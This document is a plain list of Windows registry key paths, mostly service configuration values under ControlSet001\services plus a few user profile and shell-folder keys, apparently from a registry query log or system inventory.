HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ObjectName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
